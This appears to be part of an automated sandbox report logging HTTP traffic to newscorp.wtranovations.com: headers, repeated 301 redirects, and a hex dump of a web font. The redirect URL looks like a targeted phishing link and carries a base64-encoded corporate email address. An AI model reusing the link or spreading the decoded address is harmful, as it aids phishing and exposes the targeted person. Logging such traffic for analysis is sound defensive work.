                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1314INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:16 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofy2Q63AFkIhKhgsOBhMrAuASZKoD6mSvH8yIKVDJ%2ByNxtU3Onc10yon7RCE%2FWCNPT9cfbXDtKSgUR7Yi0FbQJ0Pw2E59pv8L9uOuYoQ7LTYA1beXTkUCQXkHSaGpV3HSRj%2F63oNMS3cEetqzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=51&min_rtt=51&rtt_var=20&sent=3&recv=5&lost=0&retrans=0&sent_bytes=1219&recv_bytes=1283&delivery_rate=1212648148&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23f8dbdd5324-IAH
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128040&min_rtt=127990&rtt_var=27081&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=973&delivery_rate=31494&cwnd=227&unsent_bytes=0&cid=0a40f2e2dccbc554&ts=346&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC55INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title><
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC118INData Raw: 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: /head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      49192.168.11.1249425104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1164INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:16 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv04UlwIGsIoU3FRNJr%2FMbrwk7LmBjMjZ1%2Bw6zdMcTIDk4%2BWaxZj3CiNPDlBbTbDaNNCKvCI5O6aCkH%2FG9yZuUJvk%2Fxi6fp3sVAKqQhyUf8P43yznOoJwgQrZ6Mlkm%2B%2BJQUVzfq%2FFJfKQ1qO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=35&min_rtt=35&rtt_var=17&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23fbac3731f2-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=133252&min_rtt=133224&rtt_var=28118&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=917&delivery_rate=30304&cwnd=252&unsent_bytes=0&cid=0410099d88af0da5&ts=345&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      50192.168.11.1249427104.17.24.14443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC386OUTGET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-regular-400.woff2 HTTP/1.1
                                                                                                                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC971INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:16 GMT
                                                                                                                                                                                                                      Content-Type: application/octet-stream; charset=utf-8
                                                                                                                                                                                                                      Content-Length: 23760
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                      ETag: "619c057b-5cd0"
                                                                                                                                                                                                                      Last-Modified: Mon, 22 Nov 2021 21:02:51 GMT
                                                                                                                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                                                                                                      Expires: Wed, 11 Mar 2026 14:29:16 GMT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dRpjNobtNv%2BIoCDjz3gpRqYXLAMQL8WYgNPDV0MpoANH2WXjvns2u4gw7i3C%2BaOzW%2FZZqFO4xeln%2Fq%2FLxHPBaObMbmJJVRmj%2BGPDJ%2FZwIcDWxiGWIwyaSWQZR2jumpPGpmpZGCR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23fc88dc69e7-ATL
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC398INData Raw: 77 4f 46 32 00 01 00 00 00 00 5c d0 00 0a 00 00 00 00 e1 18 00 00 5c 86 03 00 00 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 86 1c 00 ab 14 ca 83 83 2c cb 83 10 05 88 30 07 20 85 8b 70 65 41 f4 a4 16 f7 a0 88 d4 a4 1e 00 55 b5 4c 88 b7 57 0d 88 5f 7e fb e3 af 7f fe fb 8b c0 b8 89 8f 75 9e 6f 1e fe bf 9f ea ef 17 40 92 fd 94 36 4c 6a ab 38 4c 86 00 82 4b 84 c3 3f eb 5a ee 27 1c 02 e0 b9 4a 81 0d 51 be eb ad 27 39 b6 2d 1d 30 7d 05 10 70 eb 05 01 77 2c 05 10 fa 0f ff 78 f7 7c 19 81 55 a5 4a 69 4f 0f 15 8d a4 2e a9 ad 77 6f a0 9f de cd ff e6 4c 92 99 cc 64 26 21 10 41 5a a0 24 24 35 4a 81 92 dc 96 0a 57 57 ac ef ad 19 5f 4f 44 f3 c4 9c 27 db 15 31 d6 f4 53 bc ab f2 e9 f4 27 54 b5 7e de 00 98 41 9d 41 9b 01 8b 48
                                                                                                                                                                                                                      Data Ascii: wOF2\\C8$ `,0 peAULW_~uo@6Lj8LK?Z'JQ'9-0}pw,x|UJiO.woLd&!AZ$$5JWW_OD'1S'T~AAH
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 7d 26 6f 43 bd f7 7f 57 e9 ff 6e 04 dd 00 83 06 c0 a0 69 82 26 79 06 00 27 00 c9 fd 6d 00 a2 01 90 03 da 71 46 6e 38 eb fc 68 65 1b e4 1a 72 28 43 cc 4c c0 d9 b9 60 56 76 46 d6 73 f6 2c cf 72 ce 18 93 c9 b8 70 b5 d1 2a bb cd 4e d9 86 4a 15 e4 52 64 43 65 a9 82 f0 42 85 a1 f2 54 36 86 9a 57 fb 63 27 45 37 20 f8 5b 65 b4 fc a9 c1 39 d6 26 29 d3 31 d4 fb fb b6 59 ab 12 48 a8 8a cc f2 3b 17 1c 33 21 d3 96 e4 3e 46 b3 7d a6 9b 57 94 88 a8 dc d1 c8 68 c9 0d d7 bf f6 f0 ce 86 ae b3 3f d2 b1 c5 7f 00 d8 eb b7 1f bc d1 f9 bd 59 73 53 8b c6 ac 09 ed 14 f9 1e 75 6f 24 6b 6a 6e a2 45 63 73 33 2d 1a 5b f3 1e f8 f7 52 cf f9 9e 8f 75 e6 d9 87 a7 e4 e1 5b 65 3f cf 1e d0 9a 6c 69 b6 1b 0b 6e 5f d7 47 fa bb 85 16 5a b7 6c b4 31 eb d6 7e 93 eb 36 ac 59 a6 49 a1 b9 79 1c 5d
                                                                                                                                                                                                                      Data Ascii: }&oCWni&y'mqFn8her(CL`VvFs,rp*NJRdCeBT6Wc'E7 [e9&)1YH;3!>F}Wh?YsSuo$kjnEcs3-[Ru[e?lin_GZl1~6YIy]
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 3a ed ac 4b 2e bb d9 ad 6e 73 bb 3b dd e5 6e f7 b8 cf 43 1e f6 98 c7 3d e1 49 cf 78 d6 73 9e f7 82 17 bd e4 65 af e8 04 5d 46 4f ad 20 1b 83 c2 79 68 86 f1 98 e1 a2 73 af c3 66 6a e9 db 2e 4a 27 6c 57 3a 63 87 d2 05 3b 95 ae d8 a5 74 c3 6e a5 3b f6 28 3d b0 57 e9 89 7d 4a 2f ec 57 7a e3 80 d2 07 07 95 be 38 a4 f4 c3 61 a5 3f 8e 28 03 70 54 19 88 63 ca 20 1c 57 06 e3 84 32 04 27 95 a1 38 a5 0c c3 69 65 38 ce 28 23 70 56 29 e0 9c 5e a5 41 43 cf a3 1a 6f 42 39 8a f7 ee 7d 99 c2 48 c2 0a 0a 57 09 a7 29 7c 4d a8 a7 fa 05 42 99 ea 9f 11 96 50 fd 05 e4 89 2f 41 28 93 23 d4 91 77 27 ac 21 1f 4c 28 91 cf 20 2c 23 df 4c 78 8e 7c 0b e1 45 f2 5a c2 4b e4 75 84 67 c9 eb 09 cf 93 37 10 5e 20 df 45 c8 c9 df 22 2c 21 7f 1b 68 f1 3e 08 87 28 b6 26 ac a1 d8 9e 30 9f 62 47
                                                                                                                                                                                                                      Data Ascii: :K.ns;nC=Ixse]FO yhsfj.J'lW:c;tn;(=W}J/Wz8a?(pTc W2'8ie8(#pV)^ACoB9}HW)|MBP/A(#w'!L( ,#Lx|EZKug7^ E",!h>(&0bG
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 01 7f 7c 60 3c e1 f0 ff 92 56 ea 12 69 64 91 47 11 65 a0 e2 88 c8 88 c8 e4 8c cc 8c cc e2 0e 1d 3b 74 4c ae a8 ac a8 4c 4f ae ec 18 59 d9 9a 18 92 5c 18 52 da 51 a3 fe 3d 4e 4b 88 97 e2 13 d2 54 94 96 10 2f c5 27 a4 cd 99 b3 6e ce cb 39 f7 90 d9 0b 2f 9c bd f0 f7 17 c2 04 a4 e9 4c 47 8e 59 b4 6d bc e8 9b a6 1f db db bb 6a 6f 6f 71 0f 5e be b7 b8 b7 f7 d9 e8 d9 3e d8 87 09 8c d1 6b d0 1b 11 82 20 4d e2 28 8e 28 b1 c8 55 36 28 71 1d df 1b 00 0d 31 c4 f7 7c af 97 ec 40 2f 6c e8 ce d3 4d 93 fe 5a 1c 2d 41 1a d6 25 a0 41 da a3 30 de e0 40 a9 29 0d ae 18 6f 0f c3 8f 9b 8c 31 66 6e b8 f7 90 dd 85 95 12 2d 09 d1 17 cf dd 13 6f 77 df ee c2 e1 81 34 38 c6 94 9a c7 9f 5b 64 5c 9a 8c 65 8c 4b 53 67 03 69 70 05 e3 d2 f1 6b 67 e9 38 63 25 86 32 69 71 3e c9 32 c4 87 e3
                                                                                                                                                                                                                      Data Ascii: |`<VidGe;tLLOY\RQ=NKT/'n9/LGYmjooq^>k M((U6(q1|@/lMZ-A%A0@)o1fn-ow48[d\eKSgipkg8c%2iq>2
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 2f 74 1b 71 d4 b7 6d 80 66 31 27 72 7b a4 00 57 c8 6c 02 da 06 6b 7f 6c 23 92 e3 7d 0f d8 c5 98 09 23 c5 dd 07 bb 09 be 04 f7 1e 5d 21 42 00 b9 23 ea 56 e4 b1 40 af 5a 2f d8 1c eb 1f 3a 2a cc 18 93 92 f1 52 36 64 b2 34 f8 2d 1b 0e 7e bd d7 33 86 3e d6 ec 10 73 b3 55 d4 4f 14 21 e3 13 9a 03 80 5d 1e bc e9 81 4d 34 07 b0 09 b8 f9 27 d0 98 eb ad 25 47 3b dd 99 19 a8 56 bb dd ed a5 28 2a 16 01 18 93 39 db 2c 16 17 8e b6 5a 18 a4 08 82 c3 5b 4b 4b c6 cd c3 7e 97 7a 97 c9 d8 e4 c5 9d 6e b9 04 b5 6a af 3b d8 e9 f6 aa b3 00 96 e9 3a b6 c9 18 e4 4c 21 00 b7 96 8f 17 9a 51 ad 8e 71 10 a4 8c 99 a6 ce 74 66 fa de 4d c7 68 1e 21 b0 bd 6e 95 39 6e 81 bf 35 e6 5c 2f 3a dd 27 9b 8c 1d 20 9e 75 99 8c 41 4a 06 b2 a9 80 52 93 09 e3 b0 a0 9e dd f6 f8 d9 e8 82 8e e0 fe 4c 0f
                                                                                                                                                                                                                      Data Ascii: /tqmf1'r{Wlkl#}#]!B#V@Z/:*R6d4-~3>sUO!]M4'%G;V(*9,Z[KK~znj;:L!QqtfMh!n9n5\/:' uAJRL
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 94 fc 4b 8b 58 69 17 3f f1 89 12 c0 5c bd d1 f0 92 c4 0d 1a f5 39 80 12 5c 57 07 58 72 9c 25 a8 2d 0d 36 5b df e4 fc 9b 2b 83 c1 d2 07 3e f7 b9 ca fc 7c ad 48 88 77 e8 90 4b 69 a9 36 3f 5f e1 72 cb 73 0e 26 78 09 26 a8 81 52 84 a0 0d 51 d0 b0 f0 c5 d9 94 f8 6f 68 13 cd 36 e8 0a 0b 52 3f 8e 2c 48 d7 da 90 26 3b e0 7b 9b fe eb 82 ed 07 0e 73 c7 36 0e 3f e0 68 c4 3c a3 a4 70 6e ea f4 86 1b a8 6e 72 ae 94 ce 30 89 e6 dc e1 5f 42 e9 25 be f6 b6 eb 99 32 18 28 ec 86 b7 13 00 c7 bb 31 9f bf d1 53 ed bc 75 ca 03 39 6e a8 c7 8e a9 06 cf dd 7f 4a 2e 6f ab 0f 5d bf ad 28 db d7 33 f2 96 02 d0 4b 2f d1 a1 f0 16 c2 10 42 2a 42 07 13 98 c0 04 e5 51 15 ad a2 23 08 35 03 42 09 75 7c af 37 d7 e5 c5 9c 9a 76 60 81 15 73 66 9e 51 af ce be e7 77 bc 33 93 03 06 42 6e f4 b2 4e
                                                                                                                                                                                                                      Data Ascii: KXi?\9\WXr%-6[+>|HwKi6?_rs&x&RQoh6R?,H&;{s6?h<pnnr0_B%2(1Su9nJ.o](3K/B*BQ#5Bu|7v`sfQw3BnN
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 1d 00 06 df 6f ea 3a c2 69 55 43 e8 fe af e1 17 61 86 ea 68 19 5d 44 fb e8 59 84 b4 ac 0e 50 0a c5 70 d5 02 11 c8 aa 1c e0 b2 da cc 46 c5 88 d5 66 43 1a 61 1b 23 1b d2 71 19 1d 55 59 3a 80 90 86 41 1e ac 22 b3 ac 74 75 ac e1 26 a3 2a 23 09 fe e4 71 de ae 97 d6 de f5 c4 07 a9 6e e9 b6 8b af 06 dc 71 ff ef 35 0d 30 94 dc 26 19 ab 92 e5 0c 93 7c e7 f2 13 bb bb e9 c2 ea e4 c3 a1 5f f5 bd 49 55 9d 86 27 76 77 53 4f a6 cd 40 01 75 79 7f ff 1d 8f 6c af 66 eb e2 da f0 01 dd 30 f4 77 56 13 80 0b 87 9a 11 f0 f9 d0 76 3d f7 e7 77 19 2f 7f 86 3b ed d8 8f dd 49 97 6b ee 44 76 96 57 1f 25 6b 46 77 0d b0 82 cb fe 22 e4 b0 31 b8 b6 d8 ee 2c ae 1e af 20 ee 05 08 99 1a cb 0a 66 a8 87 32 b4 86 86 a8 44 db e8 41 74 19 5d 41 37 10 0a 8a 31 3e ac 56 c0 1f 88 64 e1 ea f9 68 31
                                                                                                                                                                                                                      Data Ascii: o:iUCah]DYPpFfCa#qUY:A"tu&*#qnq50&|_IU'vwSO@uylf0wVv=w/;IkDvW%kFw"1, f2DAt]A71>Vdh1
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 85 89 43 c6 23 f0 a3 c4 19 7c 3b c6 df c5 01 f8 77 bd d9 d6 e9 a4 6c fc c4 2e 2f b0 8b ae a2 17 d0 17 23 d4 df cc ca ea 6f 62 6c dc 44 32 03 83 22 75 3a cf a6 22 33 d5 d8 b2 7d bd ac dc 81 fc fc e3 cd 71 3a ce 8b 7c 58 68 e3 cd 69 52 ed 2d d0 77 9d 34 23 14 1e 2f 44 44 18 85 82 d0 30 4a b3 34 8b 0e 09 8f c3 61 8a 63 8c 63 3c 99 70 d6 c2 6f 36 56 46 35 11 da 1d 1f 2f 2d ef 1c 77 c2 10 75 60 9f e0 71 ca d1 54 23 f7 01 27 e5 2e c0 dd f9 6d bb 63 47 23 cf b2 75 dd b6 75 1d 4b 89 39 93 0a ce 14 b5 2b 04 b8 0c 3e 49 cc b7 64 1a e1 b2 69 84 cb aa 3a 5b 2d b6 03 b6 2d 26 9d c5 f7 6f 2f 65 53 d8 b4 4a e7 07 1e c3 e6 81 9d 79 53 5b 52 30 e0 df 7c 7f 24 26 01 d8 96 77 d3 d6 75 5d b7 37 25 c6 72 b3 1e 04 86 61 51 02 e0 0f 6c 53 af d5 7a 6f f7 36 be 6d 50 74 80 5e 44
                                                                                                                                                                                                                      Data Ascii: C#|;wl./#oblD2"u:"3}q:|XhiR-w4#/DD0J4acc<po6VF5/-wu`qT#'.mcG#uuK9+>Idi:[--&o/eSJyS[R0|$&wu]7%raQlSzo6mPt^D
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 83 ea d1 ee 85 e5 65 d3 67 1c 8f 74 0a ad f6 5a f7 f1 9d 9d c7 bb 6b ed 16 cc cf 1a 41 10 04 0d 9f 03 63 10 b1 0b e8 12 7a 12 7d 00 7d 06 21 e0 51 4d 51 58 3c 33 11 2d da 1c 27 f9 33 56 31 66 8c c3 45 09 07 97 55 11 79 45 59 8d 31 21 9b ec 4d b3 44 13 e4 2c bb 1f 2c a3 c2 4b 08 1d 06 17 85 ea 33 0b 8f 50 7a 2e 3d 58 02 ee 72 a8 71 00 5e 9b 1d 70 ab 13 86 70 68 a4 52 73 f7 a3 c9 21 84 61 e7 ee de a1 c4 20 0f a7 0e 86 e5 e1 fc 60 61 ff a1 c4 67 53 e6 ec 10 a7 58 de 95 18 8e 6e 0a 0b 90 73 04 61 d8 d1 bf ef 76 7e 18 88 3b 61 08 7a 27 0c e1 64 7e d7 39 e2 39 0c ea 91 b8 b6 b4 64 9e 63 89 e1 00 cb f9 2b 53 86 ce 9e c2 97 84 94 1a 6e a3 38 80 dd 46 85 a6 d7 4c c6 aa 8d ca 56 b2 16 17 24 45 5b 51 67 e5 f9 b1 81 f8 e5 de ee 1e 16 26 d5 f7 4c 4a 29 35 2f 63 29 61
                                                                                                                                                                                                                      Data Ascii: egtZkAcz}}!QMQX<3-'3V1fEUyEY1!MD,,K3Pz.=Xrq^pphRs!a `agSXnsav~;az'd~99dc+Sn8FLV$E[Qg&LJ)5/c)a
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1369INData Raw: 9a 0e 03 74 f2 df 2b 70 06 41 b0 f0 1c 0f fc 6e 8f 71 ca 6c db 70 b0 d4 69 87 31 a2 69 9a 65 6b 1a 21 4c 51 c4 97 79 18 bc 10 83 a6 61 46 89 06 a0 60 c0 36 c3 80 bd cd a5 b8 4f 74 89 cd c5 f5 c9 66 33 f0 95 05 80 05 80 16 00 18 86 f3 3f 98 6e 18 86 f3 df 1d c3 80 c5 85 20 80 2c 6c 86 02 c0 0f 44 8f bb 44 67 12 6b 8d 5a dd 67 ba 0e 84 52 12 8a 1a 21 12 14 cf 55 14 61 69 aa e1 2a 58 53 6d 5d 55 09 53 d5 40 c1 18 7b b8 d6 d4 b0 b4 f4 85 18 c0 f3 1b 61 a2 a9 61 a2 eb e1 22 42 18 a1 fb e7 b8 ce 3b 9f 47 a8 3a 27 8b 54 f1 83 65 55 8e fb e5 38 cd 12 12 0a d3 2c 21 1c 08 66 c9 db 06 19 85 e2 0c 05 8c cf eb 90 51 58 c9 7a 22 65 c3 83 01 fe 9c 91 2e 67 08 c7 1e 6f 66 c1 f8 ad d2 ec a4 aa 21 8b ea b7 fc 33 00 0b 00 0b 8a 1f 34 37 27 eb 8b 26 96 3a e9 c7 4b 9b 1e 06
                                                                                                                                                                                                                      Data Ascii: t+pAnqlpi1iek!LQyaF`6Otf3?n ,lDDgkZgR!Uai*XSm]US@{aa"B;G:'TeU8,!fQXz"e.gof!347'&:K


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      51192.168.11.1249426104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC395OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: com.apple.Safari.SearchHelper/14606.3.4 CFNetwork/976 Darwin/18.2.0 (x86_64)
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC1082INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:17 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:17 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1w7ogIJFyxp0Q4u4hIfcZ92RXnalVwY7cnPMoEqvzpeNPk0WTDLuqjBXLszuHlGAQ4sxTnubEIlZEeSxG1ZTTL4XbTTmJUlGJ1wkfwMiNOm3r%2BhHbdN%2FD8LLgDJYmFeZT7WjZIej0KA7Yig0wA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=79&min_rtt=79&rtt_var=39&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=566&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      CF-RAY: 923e23fccf2c25b5-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:17 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
